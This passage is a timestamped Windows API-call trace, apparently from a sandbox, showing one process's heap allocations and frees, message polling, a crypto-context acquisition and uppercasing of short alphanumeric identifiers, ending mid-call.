[0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.555] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6150) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.558] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.559] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0195.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.559] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0195.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.560] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.560] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.561] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0195.561] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.561] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0195.561] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.561] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.561] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.562] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.562] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.562] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.562] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.562] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.562] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.562] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.562] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.562] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.563] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.563] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.563] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.563] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.606] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.606] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.606] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.607] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.607] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.608] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.608] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.608] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.608] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.608] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.614] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.615] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.615] CharLowerBuffW (in: lpsz="bool", 